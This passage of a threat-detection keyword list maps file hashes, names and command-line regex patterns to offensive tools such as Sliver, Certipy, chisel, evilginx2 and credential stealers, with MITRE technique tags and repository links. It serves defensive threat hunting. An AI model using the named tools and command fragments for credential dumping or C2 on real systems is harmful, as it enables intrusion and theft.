"*ce75590d1d79bc808d98b70ec03355d1117ca54c3b49b6ba474aa704ea9a6c2e*",".{0,1000}ce75590d1d79bc808d98b70ec03355d1117ca54c3b49b6ba474aa704ea9a6c2e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*CE895D82-85AA-41D9-935A-9625312D87D0*",".{0,1000}CE895D82\-85AA\-41D9\-935A\-9625312D87D0.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*ce9ae24722afd760de25a8961c4446b64235936b8ac8d1c2c25625d4feaee6e6*",".{0,1000}ce9ae24722afd760de25a8961c4446b64235936b8ac8d1c2c25625d4feaee6e6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cea27c53085b6cf1d9505957144aa23b794550da5746e6a38a212a03b505e157*",".{0,1000}cea27c53085b6cf1d9505957144aa23b794550da5746e6a38a212a03b505e157.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*cee1f314c34ecccd4fcb94d0715126130d02aeb153ec8504fbbae67c244cdb45*",".{0,1000}cee1f314c34ecccd4fcb94d0715126130d02aeb153ec8504fbbae67c244cdb45.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*cef1fb3c6273b3a908f79a5a5d74dbfe4ceabd2d9f850b2bd3e08e1908c440f1*",".{0,1000}cef1fb3c6273b3a908f79a5a5d74dbfe4ceabd2d9f850b2bd3e08e1908c440f1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cefcadb734f22d7ddd0ce551628c246f4484400758ccb64afeb37bb93c78b5e0*",".{0,1000}cefcadb734f22d7ddd0ce551628c246f4484400758ccb64afeb37bb93c78b5e0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ceffb6a2cd944a1309ee3b88992ea04e456f17bc2234b861bf1ed43e51a3e973*",".{0,1000}ceffb6a2cd944a1309ee3b88992ea04e456f17bc2234b861bf1ed43e51a3e973.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*celerystalk*",".{0,1000}celerystalk.{0,1000}","offensive_tool_keyword","celerystalk","celerystalk helps you automate your network scanning/enumeration process with asynchronous jobs (aka tasks) while retaining full control of which tools you want to run.","T1046 - T1057 - T1082 - T1087 - T1069","TA0001 - TA0007","N/A","N/A","Information Gathering","https://github.com/sethsec/celerystalk","1","0","N/A","N/A","4","393","74","2021-03-24T01:23:11Z","2018-08-13T04:21:37Z" "*cerbrutus.py*",".{0,1000}cerbrutus\.py.{0,1000}","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","4","330","48","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" "*Cerbrutus-BruteForcer*",".{0,1000}Cerbrutus\-BruteForcer.{0,1000}","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","4","330","48","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" "*cert*responder.crt*",".{0,1000}cert.{0,1000}responder\.crt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*cert*responder.key*",".{0,1000}cert.{0,1000}responder\.key.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*certi.py_vulntemplates_output*",".{0,1000}certi\.py_vulntemplates_output.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*certi_py_enum*",".{0,1000}certi_py_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*Certify.exe*",".{0,1000}Certify\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*certipy account *",".{0,1000}certipy\saccount\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy auth *",".{0,1000}certipy\sauth\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy ca *",".{0,1000}certipy\sca\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy ca -backup*",".{0,1000}certipy\sca\s\-backup.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy cert *",".{0,1000}certipy\scert\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy find *",".{0,1000}certipy\sfind\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy find *",".{0,1000}certipy\sfind\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*certipy forge *",".{0,1000}certipy\sforge\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy forge *",".{0,1000}certipy\sforge\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*Certipy not found. Please install Certipy before running ADCSync*",".{0,1000}Certipy\snot\sfound\.\sPlease\sinstall\sCertipy\sbefore\srunning\sADCSync.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","9","2","185","21","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z" "*certipy relay *",".{0,1000}certipy\srelay\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy relay -ca *",".{0,1000}certipy\srelay\s\-ca\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*certipy req *",".{0,1000}certipy\sreq\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy req -u * -p * -target-ip * -dc-ip * -ca *",".{0,1000}certipy\sreq\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-target\-ip\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s\-ca\s.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","9","2","185","21","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z" "*certipy req -username *",".{0,1000}certipy\sreq\s\-username\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*certipy shadow *",".{0,1000}certipy\sshadow\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy template *",".{0,1000}certipy\stemplate\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*certipy_enum*",".{0,1000}certipy_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*certipy-master.zip*",".{0,1000}certipy\-master\.zip.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*CertStealer.csproj*",".{0,1000}CertStealer\.csproj.{0,1000}","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","464","69","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" "*CertStealer.exe*",".{0,1000}CertStealer\.exe.{0,1000}","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","464","69","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" "*CertStealer.sln*",".{0,1000}CertStealer\.sln.{0,1000}","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","464","69","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" "*certsync *--dc-ip*",".{0,1000}certsync\s.{0,1000}\-\-dc\-ip.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","7","602","68","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z" "*certsync -u *",".{0,1000}certsync\s\-u\s.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","7","602","68","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z" "*certsync -u * -p *-d * -ca-ip *",".{0,1000}certsync\s\-u\s.{0,1000}\s\-p\s.{0,1000}\-d\s.{0,1000}\s\-ca\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*certsync_ntds_dump*",".{0,1000}certsync_ntds_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*certsync-master.zip*",".{0,1000}certsync\-master\.zip.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","7","602","68","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z" "*cewl --depth * --with-numbers -*",".{0,1000}cewl\s\-\-depth\s.{0,1000}\s\-\-with\-numbers\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*cf1d4595c7a03ce084a85f1545ba3593dd396eb88049c6d5c87efaa594e41c7f*",".{0,1000}cf1d4595c7a03ce084a85f1545ba3593dd396eb88049c6d5c87efaa594e41c7f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*cf2f9d4e499c45cf102ede7ccb8e0e4e44005f9cf0313024771dda337bd6e1dd*",".{0,1000}cf2f9d4e499c45cf102ede7ccb8e0e4e44005f9cf0313024771dda337bd6e1dd.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*cf3753524bf8c852c2e81c008688ecfb91e75ba207ade5ef048c33bde631baef*",".{0,1000}cf3753524bf8c852c2e81c008688ecfb91e75ba207ade5ef048c33bde631baef.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cf9093662998386beaec51633ada8314d43b63904a3eb51e0a9096586b25ee95*",".{0,1000}cf9093662998386beaec51633ada8314d43b63904a3eb51e0a9096586b25ee95.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cf9fb0b8e718dfebc8dfb4d5a9be9e57a00994fd060c250187ed92957b69fd15*",".{0,1000}cf9fb0b8e718dfebc8dfb4d5a9be9e57a00994fd060c250187ed92957b69fd15.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cfcdad4c34f652853a157b3f5bf9f8748b5f74963ca41f32632bbd755c250882*",".{0,1000}cfcdad4c34f652853a157b3f5bf9f8748b5f74963ca41f32632bbd755c250882.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cfd8565cb10640aa0710735a30291d6edb24f6a99af3704eb6bf1a016e83564f*",".{0,1000}cfd8565cb10640aa0710735a30291d6edb24f6a99af3704eb6bf1a016e83564f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*cfed7067c52715989de828850551ceb0e92a5f1f5389a81a025424a88ab77e50*",".{0,1000}cfed7067c52715989de828850551ceb0e92a5f1f5389a81a025424a88ab77e50.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cff5798485f1f260bed03c9f82572288df0dfd169fe1e448708d229fa8112ac8*",".{0,1000}cff5798485f1f260bed03c9f82572288df0dfd169fe1e448708d229fa8112ac8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*cfprefsd_race_condition*",".{0,1000}cfprefsd_race_condition.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQ*",".{0,1000}cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQ.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*cgeeodpfagjceefieflmdfphplkenlfk*",".{0,1000}cgeeodpfagjceefieflmdfphplkenlfk.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*cGlpLmZkYS5nb3Y=*",".{0,1000}cGlpLmZkYS5nb3Y\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*cGlwZW5hbWU9*",".{0,1000}cGlwZW5hbWU9.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 